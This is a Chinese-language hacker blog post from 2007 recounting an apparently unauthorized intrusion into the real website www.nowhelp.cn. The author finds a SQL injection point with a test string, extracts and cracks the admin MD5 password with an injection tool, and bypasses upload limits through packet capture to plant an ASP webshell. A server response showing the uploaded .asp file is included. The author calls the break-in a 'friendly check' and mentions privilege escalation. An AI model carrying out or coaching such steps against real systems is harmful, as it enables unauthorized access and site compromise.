成功入侵Web Server: www.nowhelp.cn

Web Server: www.nowhelp.cn

Soft:GoCom信息平台

2007年12月11日,15点14分。得到网站 "www.nowhelp.cn" 行动起来,分析一下该网站采用asp语言编写,2话不说先闲逛全站,寻找漏洞,寻找注入点,对可疑只处进行手动注入测试,("http://www.nowhelp.cn/xxxx.asp?pid=177 and 1=2") 测试多个均无收获,正在气馁之时,随便乱点几下,哈,运气不错,  尽然暴错,这正是我想要的结果

字符串的语法错误 在查询表达式 'ProClassID=177' Order By IssueTime Desc' 中。

/xxxx.asp，行 22

哈,拿家伙,domain3.6  进一步注入, 如图片,
 



已猜出密码

密码不是明文,很明显已经通过md5加密,我们进行解密,如图





我们马上登陆后台,


试图上传自己的asp木马,恐怕让人失望了,上传文件已被限制,恐怕不能直接上传我们的asp木马,
只能通过其他方式了,
拿出我们的工具 WinSock Expert v0.6 beta1, 进行包分析

找到上传调用文件,
好,下一步进行欺骗上传,



HTTP/1.1 200 OK
Date: Tue, 11 Dec 2007 07:45:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1169
Content-Type: text/html
Cache-control: private

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body>
<SCRIPT language=javascript>
parent.HtmlEdit.focus();
var range = parent.HtmlEdit.document.selection.createRange();
range.pasteHTML('<img src=../../../UploadFiles/News/2007121115456578.gif>');
if(parent.parent.myform.UploadFiles.value==''){
parent.parent.myform.UploadFiles.value+='../../../UploadFiles/News/2007121115456578.gif';}
else{
parent.parent.myform.UploadFiles.value+='|'+'../../../UploadFiles/News/2007121115456578.gif';}
alert('上传文件成功!');
history.go(-1);
parent.HtmlEdit.focus();
</script><SCRIPT language=javascript>
parent.HtmlEdit.focus();
var range = parent.HtmlEdit.document.selection.createRange();
range.text='[upload=sp ]../../../UploadFiles/News/2007121115456503.asp [/upload]';
if(parent.parent.myform.UploadFiles.value==''){
parent.parent.myform.UploadFiles.value+='../../../UploadFiles/News/2007121115456503.asp ';}
else{
parent.parent.myform.UploadFiles.value+='|'+'../../../UploadFiles/News/2007121115456503.asp ';}
alert('上传文件成功!');
history.go(-1);
parent.HtmlEdit.focus();
</script>
</body>
</html>




哈,终于上完成




到了这步,剩下的就花点功夫进行权限提升吧,提权部分我就不多说了,如有问题可直接联系我,
在此声明,本入侵纯属友情检测,并无恶意,本人已把漏洞补好,请该网站管理员注意.